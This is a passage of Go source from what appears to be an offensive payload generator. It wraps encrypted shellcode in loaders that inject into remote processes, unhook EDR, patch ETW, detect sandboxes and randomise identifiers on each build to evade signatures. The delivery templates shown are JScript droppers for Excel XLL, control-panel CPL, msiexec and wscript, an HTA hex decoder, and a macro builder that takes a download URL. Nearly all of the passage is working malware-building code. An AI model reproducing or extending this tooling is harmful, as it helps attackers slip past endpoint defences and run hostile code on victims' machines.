		DLLStructTemplate = Struct.DLL_Refresher()
	} else {
		LoaderTemplate = Struct.WindowsVersion_DLL()
		DLLStructTemplate = Struct.DLL()
	}
	// Backslashes are doubled so the path survives as a Go string literal in
	// the generated source.
	if ProcessInjection != "" && refresher == false {
		ProcessInjection = strings.Replace(ProcessInjection, "\\", "\\\\", -1)
		DLL.Variables["processpath"] = ProcessInjection
		LoaderTemplate = Struct.WindowsVersion_DLL_Refresher()
		DLLStructTemplate = Struct.Procces_Injection_DLL()
	}

	WindowsVersionTemplate, err := template.New("WindowsVersion").Parse(LoaderTemplate)
	if err != nil {
		log.Fatal(err)

	}
	buffer.Reset()
	if err := WindowsVersionTemplate.Execute(&buffer, WindowsVersion); err != nil {
		log.Fatal(err)
	}

	DLL.Variables["SyscallNumberlist"] = buffer.String()

	// ExportName is left unset for "binary" and any unrecognised mode.
	if mode == "excel" {
		DLL.Variables["ExportName"] = Struct.JS_Office_Export()

	}
	if mode == "control" {
		DLL.Variables["ExportName"] = Struct.JS_Control_Export()

	}
	if mode == "wscript" || mode == "dll" {
		DLL.Variables["ExportName"] = Struct.WS_JS_Export()
	}

	if mode == "msiexec" {
		DLL.Variables["ExportName"] = Struct.WS_JS_Export()
	}

	buffer.Reset()

	DLLTemplate, err := template.New("DLL").Parse(DLLStructTemplate)
	if err != nil {
		log.Fatal(err)
	}
	buffer.Reset()
	if err := DLLTemplate.Execute(&buffer, DLL); err != nil {
		log.Fatal(err)
	}
	return buffer.String()

}

func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string, console bool, sandbox bool, name string, ETW bool, ProcessInjection string) string {
	var Structure string
	var buffer bytes.Buffer
	Binary := &Binary{}
	Sandboxfunction := &Sandboxfunction{}
	Sandboxfunction.Variables = make(map[string]string)
	Sandbox_DomainJoined := &Sandbox_DomainJoined{}
	Sandbox_DomainJoined.Variables = make(map[string]string)
	Binary.Variables = make(map[string]string)
	WindowsVersion := &WindowsVersion{}
	WindowsVersion.Variables = make(map[string]string)
	Binary.Variables["fullciphertext"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["ciphertext"] = Utils.B64ripper(b64ciphertext, Binary.Variables["fullciphertext"], true)
	Binary.Variables["key"] = b64key
	Binary.Variables["iv"] = b64iv
	Binary.Variables["vkey"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["viv"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["block"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["decrypted"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["mode"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["vciphertext"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["rawdata"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["stuff"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["raw_bin"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["hexdata"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["PKCS5UnPadding"] = Cryptor.VarNumberLength(4, 12)
	Binary.Variables["length"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["src"] = Cryptor.VarNumberLength(4, 12) 425 | Binary.Variables["unpadding"] = Cryptor.VarNumberLength(4, 12) 426 | 427 | Binary.Variables["loc"] = Cryptor.VarNumberLength(4, 12) 428 | Binary.Variables["dll"] = Cryptor.VarNumberLength(4, 12) 429 | Binary.Variables["error"] = Cryptor.VarNumberLength(4, 12) 430 | Binary.Variables["x"] = Cryptor.VarNumberLength(4, 12) 431 | Binary.Variables["file"] = Cryptor.VarNumberLength(4, 12) 432 | Binary.Variables["loaddll"] = Cryptor.VarNumberLength(4, 12) 433 | Binary.Variables["handle"] = Cryptor.VarNumberLength(4, 12) 434 | Binary.Variables["dllBase"] = Cryptor.VarNumberLength(4, 12) 435 | Binary.Variables["dllOffset"] = Cryptor.VarNumberLength(4, 12) 436 | Binary.Variables["old"] = Cryptor.VarNumberLength(4, 12) 437 | Binary.Variables["mem"] = Cryptor.VarNumberLength(4, 12) 438 | Binary.Variables["oldptrperms"] = Cryptor.VarNumberLength(4, 12) 439 | Binary.Variables["ptr"] = Cryptor.VarNumberLength(4, 12) 440 | Binary.Variables["shellcode"] = Cryptor.VarNumberLength(4, 12) 441 | Binary.Variables["oldshellcodeperms"] = Cryptor.VarNumberLength(4, 12) 442 | Binary.Variables["loader"] = Cryptor.VarNumberLength(4, 12) 443 | Binary.Variables["hexdata"] = Cryptor.VarNumberLength(4, 12) 444 | Binary.Variables["VirtualProtect"] = Cryptor.VarNumberLength(4, 12) 445 | Binary.Variables["procVirtualProtect"] = Cryptor.VarNumberLength(4, 12) 446 | Binary.Variables["Reloading"] = Cryptor.VarNumberLength(4, 12) 447 | Binary.Variables["bytes"] = Cryptor.VarNumberLength(4, 12) 448 | Binary.Variables["Console"] = Cryptor.VarNumberLength(4, 12) 449 | Binary.Variables["getWin"] = Cryptor.VarNumberLength(4, 12) 450 | Binary.Variables["showWin"] = Cryptor.VarNumberLength(4, 12) 451 | Binary.Variables["hwnd"] = Cryptor.VarNumberLength(4, 12) 452 | Binary.Variables["show"] = Cryptor.VarNumberLength(4, 12) 453 | Binary.Variables["SW_RESTORE"] = Cryptor.VarNumberLength(4, 12) 454 | Binary.Variables["SW_HIDE"] = 
Cryptor.VarNumberLength(4, 12) 455 | Binary.Variables["Version"] = Cryptor.VarNumberLength(4, 12) 456 | Binary.Variables["syscall"] = Cryptor.VarNumberLength(4, 12) 457 | Binary.Variables["Versionfunc"] = Cryptor.VarNumberLength(4, 12) 458 | Binary.Variables["k"] = Cryptor.VarNumberLength(4, 12) 459 | Binary.Variables["Version"] = Cryptor.VarNumberLength(4, 12) 460 | Binary.Variables["MV"] = Cryptor.VarNumberLength(4, 12) 461 | Binary.Variables["MinV"] = Cryptor.VarNumberLength(4, 12) 462 | Binary.Variables["syscallnumber"] = Cryptor.VarNumberLength(4, 12) 463 | Binary.Variables["NtProtectVirtualMemory"] = Cryptor.VarNumberLength(4, 12) 464 | Binary.Variables["bytesdata"] = Cryptor.VarNumberLength(4, 12) 465 | Binary.Variables["locdata"] = Cryptor.VarNumberLength(4, 12) 466 | Binary.Variables["xdata"] = Cryptor.VarNumberLength(4, 12) 467 | Binary.Variables["dllBasedata"] = Cryptor.VarNumberLength(4, 12) 468 | Binary.Variables["dllOffsetdata"] = Cryptor.VarNumberLength(4, 12) 469 | Binary.Variables["memdata"] = Cryptor.VarNumberLength(4, 12) 470 | Binary.Variables["customsyscall"] = Cryptor.VarNumberLength(4, 12) 471 | 472 | Binary.Variables["PROCESS_ALL_ACCESS"] = Cryptor.VarNumberLength(4, 12) 473 | Binary.Variables["errnoERROR_IO_PENDING"] = Cryptor.VarNumberLength(4, 12) 474 | Binary.Variables["errERROR_IO_PENDING"] = Cryptor.VarNumberLength(4, 12) 475 | 476 | Binary.Variables["handle"] = Cryptor.VarNumberLength(4, 12) 477 | Binary.Variables["regionsize"] = Cryptor.VarNumberLength(4, 12) 478 | Binary.Variables["runfunc"] = Cryptor.VarNumberLength(4, 12) 479 | Binary.Variables["oldptrperms"] = Cryptor.VarNumberLength(4, 12) 480 | Binary.Variables["oldfartcodeperms"] = Cryptor.VarNumberLength(4, 12) 481 | Binary.Variables["processHandle"] = Cryptor.VarNumberLength(4, 12) 482 | Binary.Variables["NewProtect"] = Cryptor.VarNumberLength(4, 12) 483 | Binary.Variables["sysid"] = Cryptor.VarNumberLength(4, 12) 484 | 485 | Binary.Variables["oldptrperms"] = 
Cryptor.VarNumberLength(4, 12) 486 | Binary.Variables["baseAddress"] = Cryptor.VarNumberLength(4, 12) 487 | Binary.Variables["regionSize"] = Cryptor.VarNumberLength(4, 12) 488 | Binary.Variables["oldprotect"] = Cryptor.VarNumberLength(4, 12) 489 | Binary.Variables["handlez"] = Cryptor.VarNumberLength(4, 12) 490 | 491 | Binary.Variables["CreateProcess"] = Cryptor.VarNumberLength(4, 12) 492 | Binary.Variables["GetModuleInformation"] = Cryptor.VarNumberLength(4, 12) 493 | Binary.Variables["ReloadRemoteProcess"] = Cryptor.VarNumberLength(4, 12) 494 | Binary.Variables["RemoteModuleReloading"] = Cryptor.VarNumberLength(4, 12) 495 | Binary.Variables["Target"] = Cryptor.VarNumberLength(4, 12) 496 | Binary.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(4, 12) 497 | Binary.Variables["addr"] = Cryptor.VarNumberLength(4, 12) 498 | Binary.Variables["buf"] = Cryptor.VarNumberLength(4, 12) 499 | Binary.Variables["bytes"] = Cryptor.VarNumberLength(4, 12) 500 | Binary.Variables["commandLine"] = Cryptor.VarNumberLength(4, 12) 501 | Binary.Variables["data"] = Cryptor.VarNumberLength(4, 12) 502 | Binary.Variables["dll"] = Cryptor.VarNumberLength(4, 12) 503 | Binary.Variables["dllBase"] = Cryptor.VarNumberLength(4, 12) 504 | Binary.Variables["dllOffset"] = Cryptor.VarNumberLength(4, 12) 505 | Binary.Variables["err"] = Cryptor.VarNumberLength(4, 12) 506 | Binary.Variables["file"] = Cryptor.VarNumberLength(4, 12) 507 | Binary.Variables["funcNtAllocateVirtualMemory"] = Cryptor.VarNumberLength(4, 12) 508 | Binary.Variables["funcNtCreateThreadEx"] = Cryptor.VarNumberLength(4, 12) 509 | Binary.Variables["funcNtProtectVirtualMemory"] = Cryptor.VarNumberLength(4, 12) 510 | Binary.Variables["funcNtWriteVirtualMemory"] = Cryptor.VarNumberLength(4, 12) 511 | Binary.Variables["hModule"] = Cryptor.VarNumberLength(4, 12) 512 | Binary.Variables["hProcess"] = Cryptor.VarNumberLength(4, 12) 513 | Binary.Variables["handle"] = Cryptor.VarNumberLength(4, 12) 514 | Binary.Variables["handleSize"] 
= Cryptor.VarNumberLength(4, 12) 515 | Binary.Variables["hh"] = Cryptor.VarNumberLength(4, 12) 516 | Binary.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(4, 12) 517 | Binary.Variables["lpBuffer"] = Cryptor.VarNumberLength(4, 12) 518 | Binary.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(4, 12) 519 | Binary.Variables["mi"] = Cryptor.VarNumberLength(4, 12) 520 | Binary.Variables["MI"] = Cryptor.VarNumberLength(4, 12) 521 | Binary.Variables["mod"] = Cryptor.VarNumberLength(4, 12) 522 | Binary.Variables["modules"] = Cryptor.VarNumberLength(4, 12) 523 | Binary.Variables["module"] = Cryptor.VarNumberLength(4, 12) 524 | Binary.Variables["nLength"] = Cryptor.VarNumberLength(4, 12) 525 | Binary.Variables["nSize"] = Cryptor.VarNumberLength(4, 12) 526 | Binary.Variables["name"] = Cryptor.VarNumberLength(4, 12) 527 | Binary.Variables["needed"] = Cryptor.VarNumberLength(4, 12) 528 | Binary.Variables["n"] = Cryptor.VarNumberLength(4, 12) 529 | Binary.Variables["offsetaddr"] = Cryptor.VarNumberLength(4, 12) 530 | Binary.Variables["oldProtect"] = Cryptor.VarNumberLength(4, 12) 531 | Binary.Variables["outString"] = Cryptor.VarNumberLength(4, 12) 532 | Binary.Variables["pi"] = Cryptor.VarNumberLength(4, 12) 533 | Binary.Variables["procEnumProcessModules"] = Cryptor.VarNumberLength(4, 12) 534 | Binary.Variables["EnumProcessModules"] = Cryptor.VarNumberLength(4, 12) 535 | Binary.Variables["procGetModuleBaseName"] = Cryptor.VarNumberLength(4, 12) 536 | Binary.Variables["GetModuleBaseName"] = Cryptor.VarNumberLength(4, 12) 537 | Binary.Variables["procGetModuleInformation"] = Cryptor.VarNumberLength(4, 12) 538 | Binary.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(4, 12) 539 | Binary.Variables["process"] = Cryptor.VarNumberLength(4, 12) 540 | Binary.Variables["rawbytes"] = Cryptor.VarNumberLength(4, 12) 541 | Binary.Variables["raw_bin"] = Cryptor.VarNumberLength(4, 12) 542 | Binary.Variables["regionsize"] = Cryptor.VarNumberLength(4, 12) 543 | 
Binary.Variables["s"] = Cryptor.VarNumberLength(4, 12) 544 | Binary.Variables["shellcode"] = Cryptor.VarNumberLength(4, 12) 545 | Binary.Variables["si"] = Cryptor.VarNumberLength(4, 12) 546 | Binary.Variables["size"] = Cryptor.VarNumberLength(4, 12) 547 | Binary.Variables["startupInfo"] = Cryptor.VarNumberLength(4, 12) 548 | Binary.Variables["x"] = Cryptor.VarNumberLength(4, 12) 549 | 550 | WindowsVersion.Variables["Version"] = Binary.Variables["Version"] 551 | WindowsVersion.Variables["syscall"] = Binary.Variables["syscall"] 552 | WindowsVersion.Variables["customsyscall"] = Binary.Variables["customsyscall"] 553 | 554 | buffer.Reset() 555 | WindowsVersionTemplate, err := template.New("WindowsVersion").Parse(Struct.WindowsVersion_Binary()) 556 | if err != nil { 557 | log.Fatal(err) 558 | 559 | } 560 | buffer.Reset() 561 | if err := WindowsVersionTemplate.Execute(&buffer, WindowsVersion); err != nil { 562 | log.Fatal(err) 563 | } 564 | Binary.Variables["SyscallNumberlist"] = buffer.String() 565 | buffer.Reset() 566 | 567 | if console == true && ProcessInjection == "" { 568 | Binary.Variables["hide"] = Binary.Variables["Console"] + "(true)" 569 | Binary.Variables["DebugImport"] = "\"io\"" 570 | Binary.Variables["Debug"] = ` 571 | var ( 572 | debugWriter io.Writer 573 | ) 574 | 575 | func printDebug(format string, v ...interface{}) { 576 | debugWriter = os.Stdout 577 | output := fmt.Sprintf("[DEBUG] ") 578 | output += format +"\n" 579 | fmt.Fprintf(debugWriter, output, v...) 
580 | } 581 | ` 582 | Binary.Variables["RefreshPE"] = "printDebug(\"RefreshPE failed:\", err)" 583 | Binary.Variables["EDR"] = "printDebug(\"[+] EDR removed\")" 584 | Binary.Variables["ShellcodeString"] = "printDebug(\"[*] Loading shellcode into a string\")" 585 | Binary.Variables["Pointer"] = "printDebug(\"[*] Create a Pointer on stack\")" 586 | Binary.Variables["CopyPointer"] = "printDebug(\"[*] Copy Pointer's attributes\")" 587 | Binary.Variables["OverwrittenShellcode"] = "printDebug(\"[*] Overwriten Pointer to point to shellcode String\")" 588 | Binary.Variables["OverWrittenPoint"] = "printDebug(\"[*] Overwriting shellcode String with Pointer's attributes\")" 589 | Binary.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+name +\" \")" 590 | Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + WindowsVersion.Variables["Version"] + ")" 591 | 592 | } else if console == true && ProcessInjection != "" { 593 | Binary.Variables["hide"] = Binary.Variables["Console"] + "(true)" 594 | Binary.Variables["DebugImport"] = `"io" 595 | "os"` 596 | Binary.Variables["Debug"] = ` 597 | var ( 598 | debugWriter io.Writer 599 | ) 600 | 601 | func printDebug(format string, v ...interface{}) { 602 | debugWriter = os.Stdout 603 | output := fmt.Sprintf("[DEBUG] ") 604 | output += format +"\n" 605 | fmt.Fprintf(debugWriter, output, v...) 
606 | } 607 | ` 608 | Binary.Variables["RefreshPE"] = "printDebug(\"RefreshPE failed:\", err)" 609 | Binary.Variables["EDR"] = "printDebug(\"[+] EDR removed\")" 610 | Binary.Variables["ShellcodeString"] = "printDebug(\"[*] Loading shellcode into a string\")" 611 | Binary.Variables["Pointer"] = "printDebug(\"[*] Create a Pointer on stack\")" 612 | Binary.Variables["CopyPointer"] = "printDebug(\"[*] Copy Pointer's attributes\")" 613 | Binary.Variables["OverwrittenShellcode"] = "printDebug(\"[*] Overwriten Pointer to point to shellcode String\")" 614 | Binary.Variables["OverWrittenPoint"] = "printDebug(\"[*] Overwriting shellcode String with Pointer's attributes\")" 615 | Binary.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+name +\" \")" 616 | Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + WindowsVersion.Variables["Version"] + ")" 617 | 618 | Binary.Variables["PPIDMessage"] = 619 | `strpid := fmt.Sprint(` + Binary.Variables["pi"] + `.ProcessId) 620 | printDebug("[*] Creating Remote Process: " + strpid) 621 | printDebug("[*] Creating Handle to Remote Process")` 622 | Binary.Variables["ModuleMessage"] = "printDebug(\"[*] Mapping Modules:\")" 623 | Binary.Variables["addr"] = Cryptor.VarNumberLength(4, 12) 624 | Binary.Variables["RemoteModuleEnumeration"] = 625 | `` + Binary.Variables["addr"] + `:= fmt.Sprintf("%X", ` + Binary.Variables["MI"] + `.LpBaseOfDll) 626 | printDebug("[+] " + ` + Binary.Variables["s"] + ` + "'s Base Address: " + ` + Binary.Variables["addr"] + `) 627 | printDebug("[*] Reloading " + ` + Binary.Variables["s"] + ` + "'s .Text Field")` 628 | Binary.Variables["RemoteModuleMessage"] = "printDebug(\"[+] Reloaded and unhooked EDR\")" 629 | Binary.Variables["RemoteReloading"] = "printDebug(\"[+] Interacting with Remote Process\")" 630 | Binary.Variables["Injecting"] = "printDebug(\"[+] Injecting Shellcode into Remote Process\")" 631 | Binary.Variables["Injected"] = "printDebug(\"[+] Injected!\")" 632 | 
633 | } else { 634 | Binary.Variables["hide"] = Binary.Variables["Console"] + "(false)" 635 | Binary.Variables["DebugImport"] = "" 636 | Binary.Variables["Debug"] = "" 637 | Binary.Variables["RefreshPE"] = "" 638 | Binary.Variables["EDR"] = "" 639 | Binary.Variables["ShellcodeString"] = "" 640 | Binary.Variables["Pointer"] = "" 641 | Binary.Variables["CopyPointer"] = "" 642 | Binary.Variables["OverwrittenShellcode"] = "" 643 | Binary.Variables["OverWrittenPoint"] = "" 644 | Binary.Variables["ReloadingMessage"] = "" 645 | Binary.Variables["VersionMessage"] = "" 646 | 647 | Binary.Variables["RemoteModuleEnumeration"] = "" 648 | Binary.Variables["PPIDMessage"] = "" 649 | Binary.Variables["ModuleMessage"] = "" 650 | Binary.Variables["RemoteModuleMessage"] = "" 651 | Binary.Variables["RemoteReloading"] = "" 652 | Binary.Variables["Injecting"] = "" 653 | Binary.Variables["Injected"] = "" 654 | } 655 | 656 | if sandbox == true { 657 | Binary.Variables["IsDomainJoined"] = Cryptor.VarNumberLength(4, 12) 658 | Binary.Variables["domain"] = Cryptor.VarNumberLength(4, 12) 659 | Binary.Variables["status"] = Cryptor.VarNumberLength(4, 12) 660 | SandboxFunctionTemplate, err := template.New("Sandboxfunction").Parse(Struct.Sandbox()) 661 | if err != nil { 662 | log.Fatal(err) 663 | } 664 | if err := SandboxFunctionTemplate.Execute(&buffer, Binary); err != nil { 665 | log.Fatal(err) 666 | } 667 | Binary.Variables["Sandboxfunction"] = buffer.String() 668 | Binary.Variables["checker"] = Cryptor.VarNumberLength(4, 12) 669 | Sandbox_DomainJoinedTemplate, err := template.New("Sandbox_DomainJoined").Parse(Struct.Sandbox_DomainJoined()) 670 | buffer.Reset() 671 | if err != nil { 672 | log.Fatal(err) 673 | } 674 | if err := Sandbox_DomainJoinedTemplate.Execute(&buffer, Binary); err != nil { 675 | log.Fatal(err) 676 | } 677 | Binary.Variables["Sandbox"] = buffer.String() 678 | buffer.Reset() 679 | } else { 680 | Binary.Variables["Sandbox"] = "" 681 | Binary.Variables["Sandboxfunction"] = "" 
Binary.Variables["SandboxImport"] = ""
}

if ETW == true {
ETW_Function, ETW := ETW_Buff()
Binary.Variables["ETW"] = ETW + "()"
Binary.Variables["ETW_Function"] = ETW_Function
} else {
Binary.Variables["ETW"] = ""
Binary.Variables["ETW_Function"] = ""
}

if ProcessInjection != "" {
ProcessInjection = strings.Replace(ProcessInjection, "\\", "\\\\", -1)
Binary.Variables["processpath"] = ProcessInjection

Structure = Struct.Procces_Injection()
} else {
Structure = Struct.Binary()
}

BinaryTemplate, err := template.New("Binary").Parse(Structure)
if err != nil {
log.Fatal(err)
}
if err := BinaryTemplate.Execute(&buffer, Binary); err != nil {
log.Fatal(err)
}
return buffer.String()
}

// JScriptLoader_Buff renders the mode-specific JScript sub-template
// ("excel", "control", "msiexec" or "wscript") from the Struct package.
// The identifier names exposed to the template are produced by
// Cryptor.VarNumberLength (not shown in this file; presumably random
// names of length 4-12, so each build uses different variable names).
//
// name is the generated base filename, filename the compiled DLL path.
// sandbox is accepted but never read in this function.
//
// Returns the rendered script together with the generated "fso" and
// "dropPath" identifiers, so that JScript_Buff can reference the same
// names. Template parse/execute failures terminate the process via
// log.Fatal; there is no error return. A mode outside the four handled
// here leaves LoaderTemplate empty, which presumably renders as "".
func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool) (string, string, string) {
	var LoaderTemplate string
	var buffer bytes.Buffer
	JScriptLoader := &JScriptLoader{}
	JScriptLoader.Variables = make(map[string]string)
	// Identifiers shared by every mode's template.
	JScriptLoader.Variables["fso"] = Cryptor.VarNumberLength(4, 12)
	JScriptLoader.Variables["dropPath"] = Cryptor.VarNumberLength(4, 12)
	JScriptLoader.Variables["value"] = Cryptor.VarNumberLength(4, 12)
	JScriptLoader.Variables["strRegPath"] = Cryptor.VarNumberLength(4, 12)
	JScriptLoader.Variables["WshShell"] = Cryptor.VarNumberLength(4, 12)
	JScriptLoader.Variables["objShell"] = Cryptor.VarNumberLength(4, 12)
	if mode == "excel" {
		// Fixed application name and registry key name are the only
		// non-random template values in this mode.
		JScriptLoader.Variables["ApplicationName"] = "excel.exe"
		JScriptLoader.Variables["RegName"] = "Excel"
		JScriptLoader.Variables["dllext"] = ".xll"
		JScriptLoader.Variables["objapp"] = Cryptor.VarNumberLength(4, 12)
		JScriptLoader.Variables["Application_Version"] = Cryptor.VarNumberLength(4, 12)
		JScriptLoader.Variables["FileName"] = name
		JScriptLoader.Variables["filename"] = filename
		LoaderTemplate = Struct.JS_Office_Sub()
	}
	if mode == "control" {
		LoaderTemplate = Struct.JS_Control_Sub()
		JScriptLoader.Variables["dllext"] = ".cpl"
		JScriptLoader.Variables["filename"] = filename
		JScriptLoader.Variables["FileName"] = name
	}
	if mode == "msiexec" {
		LoaderTemplate = Struct.JS_Msiexec_Sub()
		JScriptLoader.Variables["dllext"] = ".dll"
		JScriptLoader.Variables["filename"] = filename
		JScriptLoader.Variables["FileName"] = name
	}
	if mode == "wscript" {
		JScriptLoader.Variables["dllext"] = ".dll"
		JScriptLoader.Variables["FileName"] = name
		JScriptLoader.Variables["DLLName"] = name
		JScriptLoader.Variables["manifest"] = Cryptor.VarNumberLength(4, 12)
		JScriptLoader.Variables["ax"] = Cryptor.VarNumberLength(4, 12)
		JScriptLoader.Variables["Execute"] = Cryptor.VarNumberLength(4, 12)
		JScriptLoader.Variables["progid"] = Cryptor.VarNumberLength(4, 12)
		// NOTE(review): unlike the other modes, "filename" is set to name
		// rather than filename here — confirm this is intended.
		JScriptLoader.Variables["filename"] = name
		LoaderTemplate = Struct.WS_JS()
	}
	buffer.Reset()
	JSLoaderTemplate, err := template.New("JScriptLoader").Parse(LoaderTemplate)
	if err != nil {
		log.Fatal(err)
	}
	// Second Reset is redundant; nothing has been written since the first.
	buffer.Reset()
	if err = JSLoaderTemplate.Execute(&buffer, JScriptLoader); err != nil {
		log.Fatal(err)
	}

	return buffer.String(), JScriptLoader.Variables["fso"], JScriptLoader.Variables["dropPath"]

}

// JScript_Buff renders the final JScript file (Struct.JSfile) that embeds
// the base64 DLL payload and the mode sub-template produced by
// JScriptLoader_Buff.
//
// fso and dropPath must be the identifiers returned by JScriptLoader_Buff
// so both templates refer to the same names. encoded is the base64 DLL
// content; it is passed through Utils.B64ripper (defined elsewhere, its
// transformation is not visible here) before being placed under "dll".
// code is the sub-template output and lands in "Loader" verbatim.
// mode selects the "dllext" value and is otherwise unused.
//
// When sandbox is true the rendered script is wrapped once more in the
// Struct.WScript_Sandbox template, with the first render passed in as its
// "loader" value. Failures call log.Fatal; the rendered text is returned.
func JScript_Buff(fso string, dropPath string, encoded string, code string, name string, mode string, sandbox bool) string {
	var buffer bytes.Buffer
	JScript := &JScript{}
	SandboxJScript := &SandboxJScript{}
	JScript.Variables = make(map[string]string)
	SandboxJScript.Variables = make(map[string]string)
	JScript.Variables["DLLName"] = Cryptor.VarNumberLength(4, 12)
	JScript.Variables["fso"] = fso
	JScript.Variables["dropPath"] = dropPath
	JScript.Variables["Base64"] = Cryptor.VarNumberLength(4, 12)
	JScript.Variables["base6411"] = Cryptor.VarNumberLength(4, 12)
	JScript.Variables["rtest"] = Cryptor.VarNumberLength(4, 12)
	JScript.Variables["atest"] = Cryptor.VarNumberLength(4, 12)
	JScript.Variables["ctest"] = Cryptor.VarNumberLength(4, 12)
	JScript.Variables["ttest"] = Cryptor.VarNumberLength(4, 12)
	JScript.Variables["etest"] = Cryptor.VarNumberLength(4, 12)
	JScript.Variables["htest"] = Cryptor.VarNumberLength(4, 12)
	// "atest" is assigned a second time; the later value wins.
	JScript.Variables["atest"] = Cryptor.VarNumberLength(4, 12)
	JScript.Variables["TextStream11"] = Cryptor.VarNumberLength(4, 12)
	JScript.Variables["res1"] = Cryptor.VarNumberLength(4, 12)
	JScript.Variables["filename1"] = Cryptor.VarNumberLength(4, 12)
	JScript.Variables["characters"] = Cryptor.VarNumberLength(4, 12)
	JScript.Variables["base6411decoded"] = Cryptor.VarNumberLength(4, 12)
	JScript.Variables["BinaryStream"] = Cryptor.VarNumberLength(4, 12)
	JScript.Variables["binaryWriter"] = Cryptor.VarNumberLength(4, 12)
	JScript.Variables["dllname"] = ""
	JScript.Variables["dllvar"] = Cryptor.VarNumberLength(4, 12)
	JScript.Variables["dll"] = Utils.B64ripper(encoded, JScript.Variables["dllvar"], false)
	JScript.Variables["Loader"] = code
	if mode == "excel" {
		JScript.Variables["dllext"] = ".xll"
		JScript.Variables["FileName"] = name
	}
	if mode == "control" {
		JScript.Variables["dllext"] = ".cpl"
		JScript.Variables["FileName"] = name
	}
	if mode == "wscript" {
		JScript.Variables["dllext"] = ".dll"
		JScript.Variables["FileName"] = name
	}
	if mode == "msiexec" {
		JScript.Variables["dllext"] = ".dll"
		JScript.Variables["FileName"] = name
	}
	buffer.Reset()
	JSTemplate, err := template.New("JScript").Parse(Struct.JSfile())
	if err != nil {
		log.Fatal(err)
	}
	buffer.Reset()
	if err = JSTemplate.Execute(&buffer, JScript); err != nil {
		log.Fatal(err)
	}

	if sandbox == true {
		SandboxJScript.Variables["objShell"] = Cryptor.VarNumberLength(4, 12)
		SandboxJScript.Variables["domain"] = Cryptor.VarNumberLength(4, 12)
		// The plain render becomes the inner "loader" of the sandbox wrapper.
		SandboxJScript.Variables["loader"] = buffer.String()
		buffer.Reset()
		SandboxJSTemplate, err := template.New("SandboxJScript").Parse(Struct.WScript_Sandbox())
		if err != nil {
			log.Fatal(err)
		}
		if err = SandboxJSTemplate.Execute(&buffer, SandboxJScript); err != nil {
			log.Fatal(err)
		}
	} else {
		// Intentionally empty: without sandbox the plain render is returned.
	}
	return buffer.String()
}

// HTA_Buff renders the Struct.HTA template with the hex-encoded payload
// and the target filename. All remaining template values are generated
// identifiers from Cryptor.VarNumberLength (length 4-9 here, not 4-12 as
// in the JScript builders).
//
// Several keys ("decode", "fromByte", "decodedFile", "obshell") are
// assigned twice; only the later value reaches the template.
// Parse/execute failures call log.Fatal; the rendered text is returned.
func HTA_Buff(hexcode string, filename string) string {
	var buffer bytes.Buffer
	HTALoader := &HTALoader{}
	HTALoader.Variables = make(map[string]string)
	HTALoader.Variables["payload"] = hexcode
	HTALoader.Variables["filename"] = filename
	HTALoader.Variables["RNZyt"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["bogusWindows1252Chars"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["correctLatin1Chars"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["fos"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["obshell"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["pathworks"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["dest"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["fromByte"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["decode"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["chunkSize"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["source"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["decodedFile"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["decode"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["hexString"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["fromByte"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["decodedFile"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["sleep"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["obshell"] = Cryptor.VarNumberLength(4, 9)
	HTALoader.Variables["test1"] = Cryptor.VarNumberLength(4, 9)

	buffer.Reset()
	HTATemplate, err := template.New("HTALoader").Parse(Struct.HTA())
	if err != nil {
		log.Fatal(err)
	}
	buffer.Reset()
	if err = HTATemplate.Execute(&buffer, HTALoader); err != nil {
		log.Fatal(err)
	}
	return buffer.String()
}

// Macro_Buff renders the Struct.Macro template for the given download URL
// and output filename and prints the result to stdout. Unlike the other
// *_Buff helpers it returns nothing; the rendered macro is only printed,
// not written to a file. Failures call log.Fatal.
func Macro_Buff(URL string, outFile string) {
	var buffer bytes.Buffer
	macro := &Macro{}
	macro.Variables = make(map[string]string)
	macro.Variables["HTTPReq"] = Cryptor.VarNumberLength(4, 9)
	macro.Variables["t"] = Cryptor.VarNumberLength(4, 9)
	macro.Variables["remoteFile"] = Cryptor.VarNumberLength(4, 9)
	macro.Variables["pathOfFile"] = Cryptor.VarNumberLength(4, 9)
	macro.Variables["obj"] = Cryptor.VarNumberLength(4, 9)
	macro.Variables["Full"] = Cryptor.VarNumberLength(4, 9)
	macro.Variables["output"] = Cryptor.VarNumberLength(4, 9)
	macro.Variables["storeIn"] = Cryptor.VarNumberLength(4, 9)
